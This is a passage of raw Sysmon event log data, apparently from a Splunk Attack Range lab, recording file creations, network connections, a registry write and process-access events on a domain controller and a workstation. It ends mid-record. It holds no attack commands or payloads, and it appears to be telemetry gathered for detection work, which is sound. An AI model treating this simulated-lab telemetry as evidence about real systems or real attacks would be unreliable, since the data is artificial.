Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B0E5C80AF54F83A642CDF82218F339DD,SHA256=468D17BAD69F83DCE2064E634D18227E72EB399DFC7ADA387CAA6C2D76D148DC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000044059Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:14.978{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local64399- 23542300x800000000000000016804Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:18.734{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0BC3A377150D3FFEA0E5FB3B17860B1E,SHA256=2B8E3AD2B7E29B48B4D125E5030657A91A7D6CDEFF61CA27FBB05851C1A5A55B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044072Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:18.832{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=C05A355411F14B1514FCF50F86F71AB3,SHA256=F2C55B3F1FA087532D1FB6A02F61FD89CC5B1CB80E7EE65D5E23562643458694,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000044071Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:18.770{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=864B709FFC1111DD2D96FE45177B9E25,SHA256=6A57869D957614869E0A8D4EB93F72D461D3B83790B3ACE53A856F2C8903C9E9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000044070Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:16.596{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56370-false10.0.1.12-8000- 10341000x800000000000000044069Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:18.250{FE4C2B44-E474-63C7-2706-00000000AF02}7046344C:\Program Files\Internet Explorer\iexplore.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0f5|C:\Windows\System32\windows.storage.dll+13eb73|C:\Windows\System32\windows.storage.dll+13de13|C:\Windows\System32\windows.storage.dll+13dc99|C:\Windows\System32\shcore.dll+32717|C:\Windows\SYSTEM32\IEFRAME.dll+135c6a|C:\Windows\SYSTEM32\IEFRAME.dll+135482|C:\Windows\SYSTEM32\IEFRAME.dll+134ec0|C:\Windows\SYSTEM32\IEFRAME.dll+c661e|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044068Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:18.250{FE4C2B44-E474-63C7-2706-00000000AF02}7046344C:\Program Files\Internet Explorer\iexplore.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0f5|C:\Windows\System32\windows.storage.dll+13eade|C:\Windows\System32\windows.storage.dll+13de13|C:\Windows\System32\windows.storage.dll+13dc99|C:\Windows\System32\shcore.dll+32717|C:\Windows\SYSTEM32\IEFRAME.dll+135c6a|C:\Windows\SYSTEM32\IEFRAME.dll+135482|C:\Windows\SYSTEM32\IEFRAME.dll+134ec0|C:\Windows\SYSTEM32\IEFRAME.dll+c661e|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044067Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:18.250{FE4C2B44-E474-63C7-2706-00000000AF02}7046344C:\Program Files\Internet Explorer\iexplore.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+13eac3|C:\Windows\System32\windows.storage.dll+13de13|C:\Windows\System32\windows.storage.dll+13dc99|C:\Windows\System32\shcore.dll+32717|C:\Windows\SYSTEM32\IEFRAME.dll+135c6a|C:\Windows\SYSTEM32\IEFRAME.dll+135482|C:\Windows\SYSTEM32\IEFRAME.dll+134ec0|C:\Windows\SYSTEM32\IEFRAME.dll+c661e|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044066Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:18.250{FE4C2B44-E474-63C7-2706-00000000AF02}7046344C:\Program Files\Internet Explorer\iexplore.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+13eac3|C:\Windows\System32\windows.storage.dll+13de13|C:\Windows\System32\windows.storage.dll+13dc99|C:\Windows\System32\shcore.dll+32717|C:\Windows\SYSTEM32\IEFRAME.dll+135c6a|C:\Windows\SYSTEM32\IEFRAME.dll+135482|C:\Windows\SYSTEM32\IEFRAME.dll+134ec0|C:\Windows\SYSTEM32\IEFRAME.dll+c661e|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000044065Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:18.250{FE4C2B44-DDF7-63C7-B604-00000000AF02}3788ATTACKRANGE\AdministratorC:\Windows\system32\taskhostw.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\INetCookies\2ZKL39ZA.cookieMD5=5DCF8033FA412511A783D28468CA440C,SHA256=1E55F818E1CA95559BBAB2D3664E09733C3E5F62EBFDBD9E1940CB8937572558,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000044064Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:18.249{FE4C2B44-DDF7-63C7-B604-00000000AF02}3788ATTACKRANGE\AdministratorC:\Windows\system32\taskhostw.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\INetCookies\5NW86FMO.cookieMD5=B0F95BB6C03B23BD0D8288CBE1DCC2CC,SHA256=C39519671F6EF1C28543C4C1ABD6155DB731B49D7F9901E6DFC0E0936A78B55D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000044063Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:18.248{FE4C2B44-DDF7-63C7-B604-00000000AF02}3788ATTACKRANGE\AdministratorC:\Windows\system32\taskhostw.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\INetCookies\VFJ1TWUQ.cookieMD5=3E377653C8692D34956478B7467C7CBF,SHA256=478E57C82167E70EAF443899DB3C8F5E8EDC4A3A9EBF192FF740004B9996820F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000044062Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:18.232{FE4C2B44-DDF7-63C7-B604-00000000AF02}3788ATTACKRANGE\AdministratorC:\Windows\system32\taskhostw.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\INetCookies\ROJPP7YV.cookieMD5=BC23C5DB9DD739A4BD855370B93C208D,SHA256=1F05778486C0C4D166479D17EC5975B2C05205DAF2EB7D5C72C01F916D9AAEFC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000044061Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:18.232{FE4C2B44-DDF7-63C7-B604-00000000AF02}3788ATTACKRANGE\AdministratorC:\Windows\system32\taskhostw.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\INetCookies\P7QLRLHT.cookieMD5=8DE1617AF418C8A19A2B6D7997EAEEA3,SHA256=74E6E1B6014281CF60D1CFA3644DC1F770ACAD158335C3A58357FDE2F1BF08FE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000044073Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:19.901{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CCB68B7F8106D95DCDE5E5817277C992,SHA256=C2E131DEE6A35C6C560EEDA2615765881CC365C924811EA77E6D1C2F62F9A41F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016805Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:19.838{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2101D0AEE5F8C38F4ED1CFBE44A9A4B1,SHA256=6872BC9FD741FDBC2C0CE050C8761285B28E7B86A09F8AE63D5D7F130584B0D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000016808Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:20.930{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D0B5A4BF434045B1F7CFD0129A70C52,SHA256=902A4C79A8463E996B3061A35D537926DBFBD1512420F03D1D94E385FFEEDC3B,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044074Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:18.181{FE4C2B44-D9F5-63C7-1300-00000000AF02}1036C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56371-false209.197.3.8vip0x008.map2.ssl.hwcdn.net80http 354300x800000000000000016807Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:18.106{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50112-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 13241300x800000000000000016806Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-SetValue2023-01-18 12:23:20.166{E5A8D418-DC44-63C7-1400-00000000B002}1084C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d92b37-0xa68e1759) 23542300x800000000000000044075Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:21.048{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F9B82C3BCD46CD957CD35997DDAD12B,SHA256=1978DFC9F6E3FD0F44BCF07F0E9753D7B39A97FCBFD32F3EC9A8E504A5E552F3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000044076Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:22.133{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BDF07D94A7FA884084421DE6154FB16,SHA256=8C1FE8A822E8DB4AAAD4721D0274C93B88A7E428C76DA00CEC79F49B8AD1C788,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000016841Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:22.845{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCCE-63C7-EB00-00000000B002}3756C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000016840Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:22.842{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000016839Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:22.841{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-A300-00000000B002}968C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000016838Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:22.837{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000016837Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:22.835{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCBE-63C7-9400-00000000B002}4004C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000016836Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:22.834{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5300-00000000B002}3348C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000016835Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:22.833{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5200-00000000B002}3336C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000016834Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:22.829{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3E00-00000000B002}344C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000016833Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:22.827{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3900-00000000B002}1148C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000016832Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:22.819{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC46-63C7-3500-00000000B002}2744C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000016831Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:22.817{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC45-63C7-2200-00000000B002}2524C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000016830Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:22.800{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000016829Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:22.795{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1E00-00000000B002}1200C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000016828Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:22.793{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1D00-00000000B002}1080C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000016827Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:22.786{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1B00-00000000B002}1944C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000016826Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:22.782{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program 